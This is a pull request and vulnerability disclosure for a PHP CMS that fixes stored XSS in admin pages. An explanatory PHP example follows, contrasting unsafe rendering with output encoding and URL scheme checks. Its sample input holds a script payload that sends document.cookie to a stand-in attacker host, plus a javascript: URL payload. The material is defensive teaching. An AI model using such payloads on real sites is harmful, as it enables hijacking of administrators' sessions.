Administrator/add_pictures.php,Administrator/users.php(fix): used htmlspecialchars variable to ensure that XSS is prevented by replacing any possible bad chars #3
Dear Repository maintainer,
Hope you are going well and had a Merry Christmas.
Administrator/add_pictures.php,Administrator/users.php(fix): used htmlspecialchars variable to ensure that XSS is prevented by replacing any possible bad chars
Without applying this temporary fix, it is possible to trick admins of the CMS into executing arbitrary JavaScript code and having their cookies stolen, OR into revealing info about other websites through tools such as the BeEF hook. PoC can be provided if required.
I would like to release the PoC exploit after 2 weeks (14 days). Could you please let me know at manasmbellani@gmail.com if you have any queries, concerns or issues with the requested fix. I would recommend pulling this branch version and updating to the latest as soon as possible.
I will also be requesting a CVE number via CVE Mitre for this bug.
Wish you a very Happy New Year!
Thanks and Kind Regards,
Manas Bellani
manasmbellani@gmail.com
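As an added illustration (not code from this PR or from the CMS itself), the following PHP shows the stored-XSS pattern the fix targets and the output-encoding pattern that closes it. The array keys, function names and the attacker-controlled sample values are constructed for the example; the project's real field names may differ.

```php
<?php
// Added example, not the project's code. Field names and payloads are constructed.

// Constructed sample of what an unprivileged user could submit via a public form
// and an administrator would later view in an admin listing page.
$user = [
    'username' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'website'  => 'javascript:alert(document.cookie)',
];

// Vulnerable pattern: stored values interpolated straight into HTML.
function renderUnsafe(array $user): string {
    return "<td>{$user['username']}</td>"
         . "<td><a href=\"{$user['website']}\">site</a></td>";
}

// Hardened pattern: encode on output. ENT_QUOTES also escapes single quotes, so
// values placed inside single-quoted attributes are covered; before PHP 8.1 the
// default flags (ENT_COMPAT) left single quotes untouched, so pass them explicitly.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// htmlspecialchars() does not neutralise a javascript: URL inside href; an
// attribute that becomes a URL needs a scheme allow-list on top of encoding.
function safeUrl(string $url): string {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : '#';
}

function renderSafe(array $user): string {
    return "<td>" . e($user['username']) . "</td>"
         . "<td><a href=\"" . e(safeUrl($user['website'])) . "\">site</a></td>";
}

echo renderUnsafe($user), PHP_EOL;
// <td><script>...</script></td><td><a href="javascript:alert(document.cookie)">site</a></td>
echo renderSafe($user), PHP_EOL;
// <td>&lt;script&gt;...&lt;/script&gt;</td><td><a href="#">site</a></td>
```

Two points a reviewer of this kind of fix checks: that every place the stored value is echoed goes through the encoding helper (one missed echo re-opens the bug), and that values which end up in a URL, an inline event handler, or a `<script>` block get context-specific handling, since HTML entity encoding alone is only correct for HTML text and quoted attribute values.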